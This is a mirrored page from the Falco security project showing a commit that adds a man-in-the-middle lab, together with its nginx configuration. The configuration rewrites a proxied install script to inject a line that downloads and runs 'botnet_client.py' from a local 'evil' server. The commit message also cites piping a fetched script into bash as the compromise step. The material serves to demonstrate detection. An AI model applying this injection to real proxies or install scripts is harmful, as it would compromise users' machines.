mirror of
https://github.com/falcosecurity/falco.git
synced 2026-04-04 11:02:16 +00:00
139ee56af7
Adding docker-compose based example of man-in-the-middle attack against installation scripts and how it can be detected using sysdig falco. The docker-compose environment starts a good web server, compromised nginx installation, evil web server, and a copy of sysdig falco. The README walks through the process of compromising a client by using curl http://localhost/get-software.sh | bash and detecting the compromise using ./fbash. The fbash program included in this example fixes https://github.com/draios/falco/issues/46.
13 lines
351 B
Nginx Configuration File
13 lines
351 B
Nginx Configuration File
http {
|
|
server {
|
|
location / {
|
|
sub_filter_types '*';
|
|
sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
|
|
sub_filter_once off;
|
|
proxy_pass http://apache:80;
|
|
}
|
|
}
|
|
}
|
|
events {
|
|
}
|